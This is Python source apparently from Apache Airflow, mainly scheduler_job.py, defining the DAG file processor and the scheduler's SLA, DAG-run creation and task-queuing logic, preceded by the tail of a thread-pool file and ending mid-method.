if (self._inqueue.qsize() == 0 and
self._outqueue.qsize() == 0 and
self._taskqueue.qsize() == 0):
break
time.sleep(delay)
self.terminate()
self.join()
def inspect_threads(self):
"""
This method inspects the attributes exposed by the Worker object defined
above and lets us debug the thread pool.
This is useful for answering the question: "What functions are running in
the pool right now?"
:return: Data as a list of dicts, which is usually sent to inspect_data_to_log()
"""
inspect_data = []
for process in self._pool[:]:
worker_state = process.get_state()
inspect_data.append(worker_state)
return inspect_data
|
scheduler_job.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import multiprocessing
import os
import signal
import sys
import threading
import time
from collections import defaultdict
from datetime import timedelta
from time import sleep
from past.builtins import basestring
import six
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.orm.session import make_transient
from airflow.configuration import conf
from airflow import executors, models, settings
from airflow.exceptions import AirflowException, TaskNotFound
from airflow.jobs.base_job import BaseJob
from airflow.models import DagRun, SlaMiss, errors
from airflow.settings import Stats
from airflow.ti_deps.dep_context import DepContext, SCHEDULED_DEPS
from airflow.operators.dummy_operator import DummyOperator
from airflow.ti_deps.deps.pool_slots_available_dep import STATES_TO_COUNT_AS_RUNNING
from airflow.utils import asciiart, helpers, timezone
from airflow.utils.dag_processing import (AbstractDagFileProcessor,
DagFileProcessorAgent,
SimpleDag,
SimpleDagBag,
SimpleTaskInstance,
list_py_file_paths)
from airflow.utils.db import provide_session
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.state import State
class DagFileProcessor(AbstractDagFileProcessor, LoggingMixin, MultiprocessingStartMethodMixin):
"""Helps call SchedulerJob.process_file() in a separate process.
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: unicode
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: list[unicode]
:param zombies: zombie task instances to kill
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(self, file_path, pickle_dags, dag_ids, zombies):
self._file_path = file_path
# The process that was launched to process the given .
self._process = None
self._dag_ids = dag_ids
self._pickle_dags = pickle_dags
self._zombies = zombies
# The result of Scheduler.process_file(file_path).
self._result = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time = None
# This ID is use to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessor.class_creation_counter
DagFileProcessor.class_creation_counter += 1
@property
def file_path(self):
return self._file_path
@staticmethod
def _run_file_processor(result_channel,
file_path,
pickle_dags,
dag_ids,
thread_name,
zombies):
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: unicode
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_ids: if specified, only examine DAG ID's that are
in this list
:type dag_ids: list[unicode]
:param thread_name: the name to use for the process that is launched
:type thread_name: unicode
:param zombies: zombie task instances to kill
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
:return: the process that was launched
:rtype: multiprocessing.Process
"""
# This helper runs in the newly created process
log = logging.getLogger("airflow.processor")
stdout = StreamLogWriter(log, logging.INFO)
stderr = StreamLogWriter(log, logging.WARN)
log.info("Setting log context for file {}".format(file_path))
# log file created here
set_context(log, file_path)
log.info("Successfully set log context for file {}".format(file_path))
setproctitle("airflow scheduler - DagFileProcessor {}".format(file_path))
try:
# redirect stdout/stderr to log
sys.stdout = stdout
sys.stderr = stderr
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
start_time = time.time()
log.info("Started process (PID=%s) to work on %s",
os.getpid(), file_path)
scheduler_job = SchedulerJob(dag_ids=dag_ids, log=log)
log.info("Processing file {}".format(file_path))
result = scheduler_job.process_file(file_path,
zombies,
pickle_dags)
result_channel.send(result)
end_time = time.time()
log.info(
"Processing %s took %.3f seconds", file_path, end_time - start_time
)
except Exception:
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
result_channel.close()
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
def start(self):
"""
Launch the process and start processing the DAG.
"""
if six.PY2:
context = multiprocessing
else:
start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(start_method)
self._parent_channel, _child_channel = context.Pipe()
self._process = context.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
self.file_path,
self._pickle_dags,
self._dag_ids,
"DagFileProcessor{}".format(self._instance_id),
self._zombies
),
name="DagFileProcessor{}-Process".format(self._instance_id)
)
self._start_time = timezone.utcnow()
self._process.start()
def kill(self):
"""
Kill the process launched to process the file, and ensure consistent state.
"""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
# The queue will likely get corrupted, so remove the reference
self._result_queue = None
self._kill_process()
def terminate(self, sigkill=False):
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
if six.PY2:
self._process.join(5)
else:
from contextlib import suppress
with suppress(TimeoutError):
self._process._popen.wait(5) # pylint: disable=protected-access
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self):
if self._process.is_alive():
self.log.warning("Killing PID %s", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
@property
def pid(self):
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self):
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self):
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
pass
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self):
"""
:return: result of running SchedulerJob.process_file()
:rtype: airflow.utils.dag_processing.SimpleDag
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self):
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
class SchedulerJob(BaseJob):
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: unicode
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[unicode]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: unicode
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param run_duration: how long to run (in seconds) before exiting
:type run_duration: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {
'polymorphic_identity': 'SchedulerJob'
}
heartrate = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
dag_id=None,
dag_ids=None,
subdir=settings.DAGS_FOLDER,
num_runs=conf.getint('scheduler', 'num_runs', fallback=-1),
processor_poll_interval=conf.getfloat(
'scheduler', 'processor_poll_interval', fallback=1),
run_duration=None,
do_pickle=False,
log=None,
*args, **kwargs):
"""
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: unicode
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[unicode]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: unicode
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
# for BaseJob compatibility
self.dag_id = dag_id
self.dag_ids = [dag_id] if dag_id else []
if dag_ids:
self.dag_ids.extend(dag_ids)
self.subdir = subdir
self.num_runs = num_runs
self.run_duration = run_duration
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super(SchedulerJob, self).__init__(*args, **kwargs)
self.max_threads = conf.getint('scheduler', 'parsing_processes')
if log:
self._log = log
self.using_sqlite = False
self.using_mysql = False
if conf.get('core', 'sql_alchemy_conn').lower().startswith('sqlite'):
self.using_sqlite = True
if conf.get('core', 'sql_alchemy_conn').lower().startswith('mysql'):
self.using_mysql = True
self.max_tis_per_query = conf.getint('scheduler', 'max_tis_per_query')
self.processor_agent = None
self.max_tis_per_query = conf.getint('scheduler', 'max_tis_per_query')
if run_duration is None:
self.run_duration = conf.getint('scheduler',
'run_duration')
self.processor_agent = None
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame):
"""
Helper method to clean up processor_agent to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def is_alive(self, grace_multiplier=None):
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super(SchedulerJob, self).is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING and
(timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
@provide_session
def manage_slas(self, dag, session=None):
"""
Finding all tasks that have SLAs defined, and sending alert emails
where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
if not any([isinstance(ti.sla, timedelta) for ti in dag.tasks]):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
# This is a temporary fix for 1.10.4 release.
# Background: AIRFLOW-4297
# TODO: refactor manage_slas() to handle related issues.
if dag.normalized_schedule_interval is None:
self.log.info("SLA check for DAGs with schedule_interval 'None'/'@once' are "
"skipped in 1.10.4, due to related refactoring going on.")
return
TI = models.TaskInstance
sq = (
session
.query(
TI.task_id,
func.max(TI.execution_date).label('max_ti'))
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(or_(
TI.state == State.SUCCESS,
TI.state == State.SKIPPED))
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id).subquery('sq')
)
max_tis = session.query(TI).filter(
TI.dag_id == dag.dag_id,
TI.task_id == sq.c.task_id,
TI.execution_date == sq.c.max_ti,
).all()
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
dttm = ti.execution_date
if isinstance(task.sla, timedelta):
dttm = dag.following_schedule(dttm)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(SlaMiss(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=dttm,
timestamp=ts))
dttm = dag.following_schedule(dttm)
session.commit()
slas = (
session
.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa pylint: disable=singleton-comparison
.all()
)
if slas:
sla_dates = [sla.execution_date for sla in slas]
qry = (
session
.query(TI)
.filter(
TI.state != State.SUCCESS,
TI.execution_date.in_(sla_dates),
TI.dag_id == dag.dag_id
).all()
)
blocking_tis = []
for ti in qry:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join([
sla.task_id + ' on ' + sla.execution_date.isoformat()
for sla in slas])
blocking_task_list = "\n".join([
ti.task_id + ' on ' + ti.execution_date.isoformat()
for ti in blocking_tis])
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info(' --------------> ABOUT TO CALL SLA MISS CALL BACK ')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas,
blocking_tis)
notification_sent = True
except Exception:
self.log.exception("Could not call sla_miss_callback for DAG %s",
dag.dag_id)
email_content = """\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n<code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}\n{bug}<code></pre>
Airflow Web Server URL: {webserver_base_url}
""".format(task_list=task_list, blocking_task_list=blocking_task_list,
bug=asciiart.bug, webserver_base_url=conf.get(section='webserver', key='base_url'))
tasks_missed_sla = []
for sla in slas:
try:
task = dag.get_task(sla.task_id)
except TaskNotFound:
# task already deleted from DAG, skip it
self.log.warning(
"Task %s doesn't exist in DAG anymore, skipping SLA miss notification.",
sla.task_id)
continue
tasks_missed_sla.append(task)
emails = set()
for task in tasks_missed_sla:
if task.email:
if isinstance(task.email, basestring):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(
emails,
"[airflow] SLA miss on DAG=" + dag.dag_id,
email_content)
email_sent = True
notification_sent = True
except Exception:
self.log.exception("Could not send SLA Miss email notification for"
" DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
if email_sent:
sla.email_sent = True
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session, dagbag):
"""
For the DAGs in the given DagBag, record any associated import errors and clears
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.models.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(
errors.ImportError.filename == dagbag_file
).delete()
# Add the errors of the processed files
for filename, stacktrace in six.iteritems(dagbag.import_errors):
session.add(errors.ImportError(
filename=filename,
timestamp=timezone.utcnow(),
stacktrace=stacktrace))
session.commit()
@provide_session
def create_dag_run(self, dag, session=None):
"""
This method checks whether a new DagRun needs to be created
for a DAG based on scheduling interval.
Returns DagRun if one is scheduled. Otherwise returns None.
"""
if dag.schedule_interval and conf.getboolean('scheduler', 'USE_JOB_SCHEDULE'):
active_runs = DagRun.find(
dag_id=dag.dag_id,
state=State.RUNNING,
external_trigger=False,
session=session
)
# return if already reached maximum active runs and no timeout setting
if len(active_runs) >= dag.max_active_runs and not dag.dagrun_timeout:
return
timedout_runs = 0
for dr in active_runs:
if (
dr.start_date and dag.dagrun_timeout and
dr.start_date < timezone.utcnow() - dag.dagrun_timeout):
dr.state = State.FAILED
dr.end_date = timezone.utcnow()
dag.handle_callback(dr, success=False, reason='dagrun_timeout',
session=session)
timedout_runs += 1
session.commit()
if len(active_runs) - timedout_runs >= dag.max_active_runs:
return
# this query should be replaced by find dagrun
qry = (
session.query(func.max(DagRun.execution_date))
.filter_by(dag_id=dag.dag_id)
.filter(or_(
DagRun.external_trigger == False, # noqa: E712 pylint: disable=singleton-comparison
# add % as a wildcard for the like query
DagRun.run_id.like(DagRun.ID_PREFIX + '%')
))
)
last_scheduled_run = qry.scalar()
# don't schedule @once again
if dag.schedule_interval == '@once' and last_scheduled_run:
return None
# don't do scheduler catchup for dag's that don't have dag.catchup = True
if not (dag.catchup or dag.schedule_interval == '@once'):
# The logic is that we move start_date up until
# one period before, so that timezone.utcnow() is AFTER
# the period end, and the job can be created...
now = timezone.utcnow()
next_start = dag.following_schedule(now)
last_start = dag.previous_schedule(now)
if next_start <= now or isinstance(dag.schedule_interval, timedelta):
new_start = last_start
else:
new_start = dag.previous_schedule(last_start)
if dag.start_date:
if new_start >= dag.start_date:
dag.start_date = new_start
else:
dag.start_date = new_start
next_run_date = None
if not last_scheduled_run:
# First run
task_start_dates = [t.start_date for t in dag.tasks]
if task_start_dates:
next_run_date = dag.normalize_schedule(min(task_start_dates))
self.log.debug(
"Next run date based on tasks %s",
next_run_date
)
else:
next_run_date = dag.following_schedule(last_scheduled_run)
# make sure backfills are also considered
last_run = dag.get_last_dagrun(session=session)
if last_run and next_run_date:
while next_run_date <= last_run.execution_date:
next_run_date = dag.following_schedule(next_run_date)
# don't ever schedule prior to the dag's start_date
if dag.start_date:
next_run_date = (dag.start_date if not next_run_date
else max(next_run_date, dag.start_date))
if next_run_date == dag.start_date:
next_run_date = dag.normalize_schedule(dag.start_date)
self.log.debug(
"Dag start date: %s. Next run date: %s",
dag.start_date, next_run_date
)
# don't ever schedule in the future or if next_run_date is None
if not next_run_date or next_run_date > timezone.utcnow():
return
# this structure is necessary to avoid a TypeError from concatenating
# NoneType
if dag.schedule_interval == '@once':
period_end = next_run_date
elif next_run_date:
period_end = dag.following_schedule(next_run_date)
# Don't schedule a dag beyond its end_date (as specified by the dag param)
if next_run_date and dag.end_date and next_run_date > dag.end_date:
return
# Don't schedule a dag beyond its end_date (as specified by the task params)
# Get the min task end date, which may come from the dag.default_args
min_task_end_date = []
task_end_dates = [t.end_date for t in dag.tasks if t.end_date]
if task_end_dates:
min_task_end_date = min(task_end_dates)
if next_run_date and min_task_end_date and next_run_date > min_task_end_date:
return
if next_run_date and period_end and period_end <= timezone.utcnow():
next_run = dag.create_dagrun(
run_id=DagRun.ID_PREFIX + next_run_date.isoformat(),
execution_date=next_run_date,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False
)
return next_run
@provide_session
def _process_task_instances(self, dag, task_instances_list, session=None):
"""
This method schedules the tasks for a single DAG by looking at the
active DAG runs and adding task instances that should run to the
queue.
"""
# update the state of the previously active dag runs
dag_runs = DagRun.find(dag_id=dag.dag_id, state=State.RUNNING, session=session)
active_dag_runs = []
for run in dag_runs:
self.log.info("Examining DAG run %s", run)
# don't consider runs that are executed in the future unless
# specified by config and schedule_interval is None
if run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.error(
"Execution date is in future: %s",
run.execution_date
)
continue
if len(active_dag_runs) >= dag.max_active_runs:
self.log.info("Number of active dag runs reached max_active_run.")
break
# skip backfill dagruns for now as long as they are not really scheduled
if run.is_backfill:
continue
# todo: run.dag is transient but needs to be set
run.dag = dag
# todo: preferably the integrity check happens at dag collection time
run.verify_integrity(session=session)
ready_tis = run.update_state(session=session)
if run.state == State.RUNNING:
active_dag_runs.append(run)
self.log.debug("Examining active DAG run: %s", run)
for ti in ready_tis:
self.log.debug('Queuing task: %s', ti)
task_instances_list.append(ti.key)
@provide_session
def _change_state_for_tis_without_dagrun(self,
simple_dag_bag,
old_states,
new_state,
session=None):
"""
For all DAG IDs in the SimpleDagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
normally should not happen, but it can if the state of DagRuns are
changed manually.
:param old_states: examine TaskInstances in this state
:type old_states: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag and with states in the old_states will be examined
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
tis_changed = 0
query = session \
.query(models.TaskInstance) \
.outerjoin(models.DagRun, and_(
models.TaskInstance.dag_id == models.DagRun.dag_id,
models.TaskInstance.execution_date == models.DagRun.execution_date)) \
.filter(models.TaskInstance.dag_id.in_(simple_dag_bag.dag_ids)) \
.filter(models.TaskInstance.state.in_(old_states)) \
.filter(or_(
models.DagRun.state != State.RUNNING,
models.DagRun.state.is_(None)))
# We need to do this for mysql as well because it can cause deadlocks
# as discussed in https://issues.apache.org/jira/browse/AIRFLOW-2516
if self.using_sqlite or self.using_mysql:
tis_to_change = query \
.with_for_update() \
.all()
for ti in tis_to_change:
ti.set_state(new_state, session=session)
tis_changed += 1
else:
subq = query.subquery()
tis_changed = session \
.query(models.TaskInstance) \
.filter(and_(
models.TaskInstance.dag_id == subq.c.dag_id,
models.TaskInstance.task_id == subq.c.task_id,
models.TaskInstance.execution_date ==
subq.c.execution_date)) \
.update({models.TaskInstance.state: new_state},
synchronize_session=False)
session.commit()
if tis_changed > 0:
self.log.warning(
"Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
tis_changed, new_state
)
Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(self, states, session=None):
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from (dag_id, task_id) to # of task instances and
a map from (dag_id, task_id) to # of task instances in the given state list
:rtype: dict[tuple[str, str], int]
"""
TI = models.TaskInstance
ti_concurrency_query = (
session
.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map = defaultdict(int)
task_map = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
@provide_session
def _find_executable_task_instances(self, simple_dag_bag, states, session=None):
"""
Finds TIs that are ready for execution with respect to pool limits,
dag concurrency, executor state, and priority.
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag will be fetched from the DB and executed
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
:param executor: the executor that runs task instances
:type executor: BaseExecutor
:param states: Execute TaskInstances in these states
:type states: tuple[airflow.utils.state.State]
:return: list[airflow.models.TaskInstance]
"""
from airflow.jobs.backfill_job import BackfillJob # Avoid circular import
executable_tis = []
# Get all task instances associated with scheduled
# DagRuns which are not backfilled, in the given states,
# and the dag is not paused
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
ti_query = (
session
.query(TI)
.filter(TI.dag_id.in_(simple_dag_bag.dag_ids))
.outerjoin(
DR,
and_(DR.dag_id == TI.dag_id, DR.execution_date == TI.execution_date)
)
.filter(or_(DR.run_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DR.run_id.like(BackfillJob.ID_PREFIX + '%'))))
.outerjoin(DM, DM.dag_id == TI.dag_id)
.filter(or_(DM.dag_id == None, # noqa: E711 pylint: disable=singleton-comparison
not_(DM.is_paused)))
)
# Additional filters on task instance state
if None in states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(states)) # noqa: E711 pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(states))
task_instances_to_examine = ti_query.all()
if len(task_instances_to_examine) == 0:
self.log.debug("No tasks to consider for execution.")
return executable_tis
# Put one task instance on each line
task_instance_str = "\n\t".join(
[repr(x) for x in task_instances_to_examine])
self.log.info(
"%s tasks up for execution:\n\t%s", len(task_instances_to_examine),
task_instance_str
)
# Get the pool settings
pools = {p.pool: p for p in session.query(models.Pool).all()}
pool_to_task_instances = defaultdict(list)
for task_instance in task_instances_to_examine:
pool_to_task_instances[task_instance.pool].append(task_instance)
# dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
states=STATES_TO_COUNT_AS_RUNNING, session=session)
num_tasks_in_executor = 0
num_starving_tasks_total = 0
# Go through each pool, and queue up a task for execution if there are
# any open slots in the pool.
for pool, task_instances in pool_to_task_instances.items():
pool_name = pool
if pool not in pools:
self.log.warning(
"Tasks using non-existent pool '%s' will not be scheduled",
pool
)
continue
else:
open_slots = pools[pool].open_slots(session=session)
num_ready = len(task_instances)
self.log.info(
"Figuring out tasks to run in Pool(name=%s) with %s open slots "
"and %s task instances ready to be queued",
pool, open_slots, num_ready
)
priority_sorted_task_instances = sorted(
task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date))
num_starving_tasks = 0
for current_index, task_instance in enumerate(priority_sorted_task_instances):
if open_slots <= 0:
self.log.info(
"Not scheduling since there are %s open slots in pool %s",
open_slots, pool
)
# Can't schedule any more since there are no more open slots.
num_unhandled = len(priority_sorted_task_instances) - current_index
num_starving_tasks += num_unhandled
num_starving_tasks_total += num_unhandled
break
# Check to make sure that the task concurrency of the DAG hasn't been
# reached.
dag_id = task_instance.dag_id
simple_dag = simple_dag_bag.get_dag(dag_id)
current_dag_concurrency = dag_concurrency_map[dag_id]
dag_concurrency_limit = simple_dag_bag.get_dag(dag_id).concurrency
self.log.info(
"DAG %s has %s/%s running and queued tasks",
dag_id, current_dag_concurrency, dag_concurrency_limit
)
if current_dag_concurrency >= dag_concurrency_limit:
self.log.info(
"Not executing %s since the number of tasks running or queued "
"from DAG %s is >= to the DAG's task concurrency limit of %s",
task_instance, dag_id, dag_concurrency_limit
)
continue
task_concurrency_limit = simple_dag.get_task_special_arg(
task_instance.task_id,
'task_concurrency')
if task_concurrency_limit is not None:
current_task_concurrency = task_concurrency_map[
(task_instance.dag_id, task_instance.task_id)
]
if current_task_concurrency >= task_concurrency_limit:
self.log.info("Not executing %s since the task concurrency for"
" this task has been reached.", task_instance)
continue
if self.executor.has_task(task_instance):
self.log.debug(
"Still handling task %s even though as the executor reports it is running",
task_instance.key
)
num_tasks_in_executor += 1
continue
if task_instance.pool_slots > open_slots:
self.log.info("Not executing %s since it requires %s slots "
"but there are %s open slots in the pool %s.",
task_instance, task_instance.pool_slots, open_slots, pool)
num_starving_tasks += 1
num_starving_tasks_total += 1
# Though we can execute tasks with lower priority if there's enough room
continue
executable_tis.append(task_instance)
open_slots -= task_instance.pool_slots
dag_concurrency_map[dag_id] += 1
task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1
Stats.gauge('pool.starving_tasks.{pool_name}'.format(pool_name=pool_name),
num_starving_tasks)
Stats.gauge('pool.open_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].open_slots())
Stats.gauge('pool.used_slots.{pool_name}'.format(pool_name=pool_name),
pools[pool_name].occupied_slots())
Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))
Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
Stats.gauge('scheduler.tasks.starving', num_starving_tasks_total)
Stats.gauge('scheduler.tasks.executable', len(executable_tis))
task_instance_str = "\n\t".join(
[repr(x) for x in executable_tis])
self.log.info(
"Setting the following tasks to queued state:\n\t%s", task_instance_str)
# so these dont expire on commit
for ti in executable_tis:
copy_dag_id = ti.dag_id
copy_execution_date = ti.execution_date
copy_task_id = ti.task_id
make_transient(ti)
ti.dag_id = copy_dag_id
ti.execution_date = copy_execution_date
ti.task_id = copy_task_id
return executable_tis
@provide_session
def _change_state_for_executable_task_instances(self, task_instances,
acceptable_states, session=None):
"""
Changes the state of task instances in the list with one of the given states
to QUEUED atomically, and returns the TIs changed in SimpleTaskInstance format.
:param task_instances: TaskInstances to change the state of
:type task_instances: list[airflow.models.TaskInstance]
:param acceptable_states: Filters the TaskInstances updated to be in these states
:type acceptable_states: Iterable[State]
:rtype: list[airflow.utils.dag_processing.SimpleTaskInstance]
"""
if len(task_instances) == 0:
session.commit()
return []
TI = models.TaskInstance
filter_for_ti_state_change = (
[and_(
TI.dag_id == ti.dag_id,
TI.task_id == ti.task_id,
TI.execution_date == ti.execution_date)
for ti in task_instances])
ti_query = (
session
.query(TI)
.filter(or_(*filter_for_ti_state_change)))
if None in acceptable_states:
ti_query = ti_query.filter(
or_(TI.state == None, TI.state.in_(acceptable_states)) # noqa pylint: disable=singleton-comparison
)
else:
ti_query = ti_query.filter(TI.state.in_(acceptable_states))
tis_to_set_to_queued = (
ti_query
.with_for_update()
.all())
if len(tis_to_set_to_queued) == 0:
self.log.info("No tasks were able to have their state changed to queued.")
session.commit()
return []
# set TIs to queued state
for task_instance in tis_to_set_to_queued:
task_instance.state = State.QUEUED
task_instance.queued_dttm = timezone.utcnow()
session.merge(task_instance)
# Generate a list of SimpleTaskInstance for the use of queuing
# them in the executor.
simple_task_instances = [SimpleTaskInstance(ti) for ti in
tis_to_set_to_queued]
task_instance_str = "\n\t".join(
[repr(x) for x in tis_to_set_to_queued])
session.commit()
self.log.info("Setting the following %s tasks to queued state:\n\t%s",
len(tis_to_set_to_queued), task_instance_str)
return simple_task_instances
def _enqueue_task_instances_with_queued_state(self, simple_dag_bag,
simple_task_instances):
"""
